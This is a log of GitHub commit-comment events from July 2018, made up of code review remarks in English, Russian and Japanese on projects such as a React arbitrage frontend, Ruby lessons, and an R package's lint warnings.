{"id":"7987439122","type":"CommitCommentEvent","actor":{"login":"TomaszChmielPagepro"},"repo":{"name":"Pagepro/arbitrage-frontend"},"payload":{"comment":{"id":29760417,"position":29,"line":29,"path":"src/Dashboard.tsx","commit_id":"b486cbda5431053f50323fa786ad2b5a7190ed84","created_at":"2018-07-19T07:47:53Z","updated_at":"2018-07-19T07:47:53Z","author_association":"COLLABORATOR","body":"Don't use index as key"}},"created_at":"2018-07-19T07:47:53Z"}
{"id":"7987440885","type":"CommitCommentEvent","actor":{"login":"TomaszChmielPagepro"},"repo":{"name":"Pagepro/arbitrage-frontend"},"payload":{"comment":{"id":29760422,"position":21,"line":21,"path":"src/PairTable.tsx","commit_id":"b486cbda5431053f50323fa786ad2b5a7190ed84","created_at":"2018-07-19T07:48:17Z","updated_at":"2018-07-19T07:48:17Z","author_association":"COLLABORATOR","body":"Don't use index as key"}},"created_at":"2018-07-19T07:48:17Z"}
{"id":"7987443612","type":"CommitCommentEvent","actor":{"login":"salotron"},"repo":{"name":"salotron/scenario_alt"},"payload":{"comment":{"id":29760431,"position":59,"line":12466,"path":"Scenario/Text/text_mi_dj.rpy","commit_id":"ac9d83b08b3db7169cad484c8ab2ddf490b63c4f","created_at":"2018-07-19T07:48:54Z","updated_at":"2018-07-19T07:48:54Z","author_association":"OWNER","body":"северние? это намеренное искажение слова?"}},"created_at":"2018-07-19T07:48:54Z"}
{"id":"7987450850","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29760450,"position":12,"line":12,"path":"Lesson1/quadratic_equation.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-19T07:50:28Z","updated_at":"2018-07-19T07:50:28Z","author_association":"OWNER","body":"1. насчет обращения к друг другу:  давайте на ВЫ ! \r\n2. насчет таба - пока меня все устраивает на экране редактора. искать в интернете как менять это в Sublime  пока нет времени.((\r\n3. насчет вложенности -ясно.. я тоже не хочу. просто в курсе алтернатива не обсуждалась..поэтому делал как расказано было."}},"created_at":"2018-07-19T07:50:28Z"}
{"id":"7987450858","type":"CommitCommentEvent","actor":{"login":"avlisodraude"},"repo":{"name":"beeldengeluid/labo-components"},"payload":{"comment":{"id":29760451,"position":null,"line":null,"path":null,"commit_id":"47063f3a94ac92bb389b1cca2734de0cf5b3212b","created_at":"2018-07-19T07:50:28Z","updated_at":"2018-07-19T07:50:28Z","author_association":"CONTRIBUTOR","body":"Now the project list displays the number of queries per project.\r\n<img width=\"872\" alt=\"screen shot 2018-07-19 at 09 48 55\" src=\"https://user-images.githubusercontent.com/5918438/42929011-20f40d0c-8b39-11e8-993d-feaa442a7c7c.png\">\r\n"}},"created_at":"2018-07-19T07:50:28Z"}
{"id":"7987452771","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"php-coder/mystamps"},"payload":{"comment":{"id":29760455,"position":null,"line":null,"path":null,"commit_id":"3a38ffedcbcb48c5239246c1e9540b004cdfbfad","created_at":"2018-07-19T07:50:53Z","updated_at":"2018-07-19T07:50:53Z","author_association":"COLLABORATOR","body":"Puzzle `884-3ace684f` disappeared from [`src/main/java/ru/mystamps/web/service/CollectionServiceImpl.java`](https://github.com/php-coder/mystamps/blob/master/src/main/java/ru/mystamps/web/service/CollectionServiceImpl.java), that's why I closed #890. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-19T07:50:53Z"}
{"id":"7987452909","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29760457,"position":14,"line":14,"path":"Lesson1/quadratic_equation.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-19T07:50:55Z","updated_at":"2018-07-19T07:50:55Z","author_association":"OWNER","body":"да."}},"created_at":"2018-07-19T07:50:55Z"}
{"id":"7987453091","type":"CommitCommentEvent","actor":{"login":"ww00426955"},"repo":{"name":"ww00426955/Hello_World"},"payload":{"comment":{"id":29760458,"position":null,"line":null,"path":null,"commit_id":"c7ac87f7a027e42014b1286bcb0b58aec074bb0d","created_at":"2018-07-19T07:50:58Z","updated_at":"2018-07-19T07:50:58Z","author_association":"OWNER","body":"### _**啦啦啦**_\r\n"}},"created_at":"2018-07-19T07:50:58Z"}
{"id":"7987458584","type":"CommitCommentEvent","actor":{"login":"hadley"},"repo":{"name":"r-lib/devtools"},"payload":{"comment":{"id":29760469,"position":null,"line":null,"path":null,"commit_id":"c509f1e07ad500ea5c76c92f8c372bd4cef0fc8c","created_at":"2018-07-19T07:52:12Z","updated_at":"2018-07-19T07:52:12Z","author_association":"MEMBER","body":"Does this need to run in a separate process?"}},"created_at":"2018-07-19T07:52:12Z"}
{"id":"7987459322","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18010/programming-term2"},"payload":{"comment":{"id":29760471,"position":null,"line":null,"path":null,"commit_id":"1de071e6e057425bc3951bc1594cf36c9e969da6","created_at":"2018-07-19T07:52:21Z","updated_at":"2018-07-19T07:52:21Z","author_association":"NONE","body":"確認しました。コードも見やすく、仕様にも漏れなしです。\r\nお疲れ様でした!"}},"created_at":"2018-07-19T07:52:21Z"}
{"id":"7987460084","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29760475,"position":15,"line":15,"path":"Lesson1/quadratic_equation.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-19T07:52:31Z","updated_at":"2018-07-19T07:52:31Z","author_association":"OWNER","body":"ясно"}},"created_at":"2018-07-19T07:52:31Z"}
{"id":"7987461206","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29760477,"position":18,"line":18,"path":"Lesson1/quadratic_equation.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-19T07:52:46Z","updated_at":"2018-07-19T07:52:46Z","author_association":"OWNER","body":"да"}},"created_at":"2018-07-19T07:52:46Z"}
{"id":"7987462183","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29760482,"position":19,"line":19,"path":"Lesson1/quadratic_equation.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-19T07:52:58Z","updated_at":"2018-07-19T07:52:58Z","author_association":"OWNER","body":"да"}},"created_at":"2018-07-19T07:52:58Z"}
{"id":"7987463658","type":"CommitCommentEvent","actor":{"login":"TomaszChmielPagepro"},"repo":{"name":"Pagepro/arbitrage-frontend"},"payload":{"comment":{"id":29760483,"position":19,"line":19,"path":"src/TableRow.tsx","commit_id":"b486cbda5431053f50323fa786ad2b5a7190ed84","created_at":"2018-07-19T07:53:17Z","updated_at":"2018-07-19T07:53:17Z","author_association":"COLLABORATOR","body":"Can be changed to:\r\n\r\n```\r\nconst {\r\n  buy: buyValue,\r\n  sell: sellValue\r\n} = JSON.parse(response.data)\r\n```"}},"created_at":"2018-07-19T07:53:17Z"}
{"id":"7987463845","type":"CommitCommentEvent","actor":{"login":"arnaudbesnier"},"repo":{"name":"ForestAdmin/forest-live-demo-rails"},"payload":{"comment":{"id":29760484,"position":5,"line":8,"path":"Gemfile","commit_id":"72aa765c3635cb008832bb67d3963ef18062eefc","created_at":"2018-07-19T07:53:19Z","updated_at":"2018-07-19T07:53:19Z","author_association":"MEMBER","body":"the gem declaration would be much cleaner at line 65 ;)"}},"created_at":"2018-07-19T07:53:19Z"}
{"id":"7987464443","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29760486,"position":22,"line":22,"path":"Lesson1/quadratic_equation.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-19T07:53:27Z","updated_at":"2018-07-19T07:53:27Z","author_association":"OWNER","body":"все верно тут. "}},"created_at":"2018-07-19T07:53:27Z"}
{"id":"7987466318","type":"CommitCommentEvent","actor":{"login":"arnaudbesnier"},"repo":{"name":"ForestAdmin/forest-live-demo-rails"},"payload":{"comment":{"id":29760490,"position":13,"line":17,"path":"config/initializers/forest_liana.rb","commit_id":"72aa765c3635cb008832bb67d3963ef18062eefc","created_at":"2018-07-19T07:53:51Z","updated_at":"2018-07-19T07:53:51Z","author_association":"MEMBER","body":"Why did you add newlines here?"}},"created_at":"2018-07-19T07:53:51Z"}
{"id":"7987466805","type":"CommitCommentEvent","actor":{"login":"TomaszChmielPagepro"},"repo":{"name":"Pagepro/arbitrage-frontend"},"payload":{"comment":{"id":29760491,"position":20,"line":20,"path":"src/TableRow.tsx","commit_id":"b486cbda5431053f50323fa786ad2b5a7190ed84","created_at":"2018-07-19T07:53:57Z","updated_at":"2018-07-19T07:53:57Z","author_association":"COLLABORATOR","body":"` const spreadValue = (((sellValue * 100 / buyValue) - 100) * 100) / 100;`"}},"created_at":"2018-07-19T07:53:57Z"}
{"id":"7987468296","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18006/programming-term2"},"payload":{"comment":{"id":29760493,"position":null,"line":null,"path":null,"commit_id":"7866068d1f53282e654b471adbe610c9993f984e","created_at":"2018-07-19T07:54:17Z","updated_at":"2018-07-19T07:54:17Z","author_association":"NONE","body":"変数名について\r\nuserという変数ですが、個人的には「入力内容」というより「人」に見えてしまいます。\r\n例えば、input_val(入力された値)とかansweredとか(回答されたもの)とか、役割が分かりやすいといいと思います。"}},"created_at":"2018-07-19T07:54:17Z"}
{"id":"7987468781","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29760494,"position":27,"line":27,"path":"Lesson1/quadratic_equation.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-19T07:54:23Z","updated_at":"2018-07-19T07:54:23Z","author_association":"OWNER","body":"с точки зрения математики тут тоже все правильно "}},"created_at":"2018-07-19T07:54:23Z"}
{"id":"7987471917","type":"CommitCommentEvent","actor":{"login":"TomaszChmielPagepro"},"repo":{"name":"Pagepro/arbitrage-frontend"},"payload":{"comment":{"id":29760501,"position":21,"line":21,"path":"src/TableRow.tsx","commit_id":"b486cbda5431053f50323fa786ad2b5a7190ed84","created_at":"2018-07-19T07:55:06Z","updated_at":"2018-07-19T07:55:06Z","author_association":"COLLABORATOR","body":"```\r\nthis.setState({\r\n  buyValue,\r\n  sellValue,\r\n  spreadValue\r\n});\r\n```"}},"created_at":"2018-07-19T07:55:06Z"}
{"id":"7987473681","type":"CommitCommentEvent","actor":{"login":"fd0"},"repo":{"name":"restic/restic"},"payload":{"comment":{"id":29760507,"position":37,"line":640,"path":"cmd/restic/global.go","commit_id":"fe99340e408f55a270096f08f68a2f0e2a6629c3","created_at":"2018-07-19T07:55:29Z","updated_at":"2018-07-19T07:55:29Z","author_association":"MEMBER","body":"Hm, looks like an oversight. Can you please open an issue about it (no need to fill out the issue template completely)? I'll never find this comment on a commit again after closing the browser tab :)"}},"created_at":"2018-07-19T07:55:29Z"}
{"id":"7987473906","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29760508,"position":3,"line":3,"path":"Lesson1/right_triangle.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-19T07:55:32Z","updated_at":"2018-07-19T07:55:32Z","author_association":"OWNER","body":"да. только про to_f пока сведений из курса не получил"}},"created_at":"2018-07-19T07:55:32Z"}
{"id":"7987475258","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29760510,"position":10,"line":10,"path":"Lesson1/right_triangle.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-19T07:55:49Z","updated_at":"2018-07-19T07:55:49Z","author_association":"OWNER","body":"ясно"}},"created_at":"2018-07-19T07:55:49Z"}
{"id":"7987482091","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29760524,"position":22,"line":22,"path":"Lesson1/right_triangle.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-19T07:57:13Z","updated_at":"2018-07-19T07:57:13Z","author_association":"OWNER","body":"я не понял, что нужно - добавлять пустую или наоборот ?\r\nи где мне это искать?"}},"created_at":"2018-07-19T07:57:13Z"}
{"id":"7987483216","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29760526,"position":22,"line":22,"path":"Lesson1/right_triangle.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-19T07:57:28Z","updated_at":"2018-07-19T07:57:28Z","author_association":"OWNER","body":"пока не нашел"}},"created_at":"2018-07-19T07:57:28Z"}
{"id":"7987487892","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18012/programming-term2"},"payload":{"comment":{"id":29760536,"position":null,"line":null,"path":null,"commit_id":"ac8e06d14517276e254f5fdf9a2530ea56ebd578","created_at":"2018-07-19T07:58:25Z","updated_at":"2018-07-19T07:58:25Z","author_association":"NONE","body":"ここまで出来ていたらメインメニューの金額までは取得できると思います。\r\nそこまで表示して欲しかったな^^;\r\n\r\n再評価は認めますので、再提出してください。\r\nあと、細かいけど納期まで超ギリギリの提出はなるべく避けたほうが良いと思います。マシンの不具合などで運悪く間に合わなくなってしまうリスクが高まるので。"}},"created_at":"2018-07-19T07:58:25Z"}
{"id":"7987487952","type":"CommitCommentEvent","actor":{"login":"vardhan1987"},"repo":{"name":"Evolvus/infrastructure-test-doc"},"payload":{"comment":{"id":29760537,"position":null,"line":null,"path":null,"commit_id":"338479a66a6cc251b00668b6b99451fcc2e62e78","created_at":"2018-07-19T07:58:26Z","updated_at":"2018-07-19T07:58:26Z","author_association":"CONTRIBUTOR","body":"saa"}},"created_at":"2018-07-19T07:58:26Z"}
{"id":"7987488572","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29760539,"position":51,"line":51,"path":"lib/node_modules/@stdlib/stats/incr/mvmr/README.md","commit_id":"b331e5634fe726ff0e16e87814ac3f85d8164d31","created_at":"2018-07-19T07:58:32Z","updated_at":"2018-07-19T07:58:32Z","author_association":"MEMBER","body":"Because the windowed calculation is commonly referred to as the Fano factor, which uses the letter `F`, not `D`."}},"created_at":"2018-07-19T07:58:32Z"}
{"id":"7987490453","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"inbo/LSVI"},"payload":{"comment":{"id":29760543,"position":null,"line":null,"path":null,"commit_id":"7d1216efe3e7984d51ca4321673fa79d40c07500","created_at":"2018-07-19T07:58:55Z","updated_at":"2018-07-19T07:58:55Z","author_association":"NONE","body":"[R/combinerenVerschilscore.R:35:6:](https://github.com/inbo/LSVI/blob/7d1216efe3e7984d51ca4321673fa79d40c07500/R/combinerenVerschilscore.R#L35) *warning:* **local variable '%max%' assigned but may not be used**\n```r\n<U+200B>    `%max%` <- function(a, b) max(a, b)\n     ^~~~~\n```\n[R/combinerenVerschilscore.R:36:6:](https://github.com/inbo/LSVI/blob/7d1216efe3e7984d51ca4321673fa79d40c07500/R/combinerenVerschilscore.R#L36) *warning:* **local variable '%min%' assigned but may not be used**\n```r\n<U+200B>    `%min%` <- function(a, b) min(a, b)\n     ^~~~~\n```\n[R/combinerenVoorwaarden.R:31:1:](https://github.com/inbo/LSVI/blob/7d1216efe3e7984d51ca4321673fa79d40c07500/R/combinerenVoorwaarden.R#L31) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen of Formule bestaat uit EN, OF, haakjes en VoorwaardeID's (en evt. andere tekens die logische berekening toelaten)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/deselecteerKenmerkenInOpname.R:45:1:](https://github.com/inbo/LSVI/blob/7d1216efe3e7984d51ca4321673fa79d40c07500/R/deselecteerKenmerkenInOpname.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_soortenKenmerken.R:118:1:](https://github.com/inbo/LSVI/blob/7d1216efe3e7984d51ca4321673fa79d40c07500/R/invoercontroleData_soortenKenmerken.R#L118) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    Kenmerken <- Data_soortenKenmerken #naamsverandering is omdat code verplaatst is\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_soortenKenmerken.R:131:1:](https://github.com/inbo/LSVI/blob/7d1216efe3e7984d51ca4321673fa79d40c07500/R/invoercontroleData_soortenKenmerken.R#L131) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande code mag weg zodra Gert deze Canonicalname toegevoegd heeft aan de databank\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:47:1:](https://github.com/inbo/LSVI/blob/7d1216efe3e7984d51ca4321673fa79d40c07500/R/invoercontroleData_voorwaarden.R#L47) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #misschien best ook testen dat die indicator-criterium-combinatie in de databank voorkomt?  En of deze voor dat habitattype voorkomt, maar dat best verderop doen\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:48:1:](https://github.com/inbo/LSVI/blob/7d1216efe3e7984d51ca4321673fa79d40c07500/R/invoercontroleData_voorwaarden.R#L48) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #Voorwaarde ook verplichten?  Anders wel testen of het ok is als het aanwezig is.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:40:13:](https://github.com/inbo/LSVI/blob/7d1216efe3e7984d51ca4321673fa79d40c07500/R/s4_bedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:43:1:](https://github.com/inbo/LSVI/blob/7d1216efe3e7984d51ca4321673fa79d40c07500/R/s4_bedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:59:7:](https://github.com/inbo/LSVI/blob/7d1216efe3e7984d51ca4321673fa79d40c07500/R/s4_bedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:60:7:](https://github.com/inbo/LSVI/blob/7d1216efe3e7984d51ca4321673fa79d40c07500/R/s4_bedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:40:13:](https://github.com/inbo/LSVI/blob/7d1216efe3e7984d51ca4321673fa79d40c07500/R/s4_maxBedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:43:1:](https://github.com/inbo/LSVI/blob/7d1216efe3e7984d51ca4321673fa79d40c07500/R/s4_maxBedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:59:7:](https://github.com/inbo/LSVI/blob/7d1216efe3e7984d51ca4321673fa79d40c07500/R/s4_maxBedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:60:7:](https://github.com/inbo/LSVI/blob/7d1216efe3e7984d51ca4321673fa79d40c07500/R/s4_maxBedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:40:13:](https://github.com/inbo/LSVI/blob/7d1216efe3e7984d51ca4321673fa79d40c07500/R/s4_maxBedekkingExcl.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:43:1:](https://github.com/inbo/LSVI/blob/7d1216efe3e7984d51ca4321673fa79d40c07500/R/s4_maxBedekkingExcl.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:59:7:](https://github.com/inbo/LSVI/blob/7d1216efe3e7984d51ca4321673fa79d40c07500/R/s4_maxBedekkingExcl.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:60:7:](https://github.com/inbo/LSVI/blob/7d1216efe3e7984d51ca4321673fa79d40c07500/R/s4_maxBedekkingExcl.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/selecteerKenmerkenInOpname.R:55:1:](https://github.com/inbo/LSVI/blob/7d1216efe3e7984d51ca4321673fa79d40c07500/R/selecteerKenmerkenInOpname.R#L55) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/zzz.R:31:13:](https://github.com/inbo/LSVI/blob/7d1216efe3e7984d51ca4321673fa79d40c07500/R/zzz.R#L31) *warning:* **no visible binding for global variable 'ConnectiePool'**\n```r\n<U+200B>  poolClose(ConnectiePool)\n            ^~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:26:3:](https://github.com/inbo/LSVI/blob/7d1216efe3e7984d51ca4321673fa79d40c07500/inst/tests/testthat/test_berekenLSVIbasis.R#L26) *style:* **Commented code should be removed.**\n```r\n<U+200B># save(Resultaat, file = \"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:27:3:](https://github.com/inbo/LSVI/blob/7d1216efe3e7984d51ca4321673fa79d40c07500/inst/tests/testthat/test_berekenLSVIbasis.R#L27) *style:* **Commented code should be removed.**\n```r\n<U+200B># load(\"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:485:1:](https://github.com/inbo/LSVI/blob/7d1216efe3e7984d51ca4321673fa79d40c07500/inst/tests/testthat/test_berekenLSVIbasis.R#L485) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen: \"Niet alle te evalueren soorten zijn opgenomen onder Data_soorten\\\\$Soort_Latijn, er wordt van uitgegaan dat de niet opgenomen soorten niet waargenomen zijn\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:486:1:](https://github.com/inbo/LSVI/blob/7d1216efe3e7984d51ca4321673fa79d40c07500/inst/tests/testthat/test_berekenLSVIbasis.R#L486) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog extra tests toevoegen voor genera en habitatsubtypes als de ontwikkeling hiervoor op punt staat\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_s4_Aantal.R:189:1:](https://github.com/inbo/LSVI/blob/7d1216efe3e7984d51ca4321673fa79d40c07500/inst/tests/testthat/test_s4_Aantal.R#L189) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>  #nog toevoegen als het opzoeken van soorten in subniveaus opgelost is: de aggregatie van bedekkingen gebeurt correct\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-19T07:58:55Z"}
{"id":"7987493225","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29760551,"position":11,"line":7,"path":"Lesson1/the_weight.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-19T07:59:31Z","updated_at":"2018-07-19T07:59:31Z","author_association":"OWNER","body":"ну ясно.. читать по-английски лучше, чем видеть сразу логическую структуру )"}},"created_at":"2018-07-19T07:59:31Z"}
{"id":"7987495723","type":"CommitCommentEvent","actor":{"login":"seb-elico"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29760553,"position":null,"line":null,"path":null,"commit_id":"57676dc7d10b50bee44d122d48863586b18e4593","created_at":"2018-07-19T08:00:03Z","updated_at":"2018-07-19T08:00:03Z","author_association":"CONTRIBUTOR","body":"> @seb-elico why master?\r\n\r\n@mart-e Just to be sure, you meant @seb-odoo, right?"}},"created_at":"2018-07-19T08:00:03Z"}
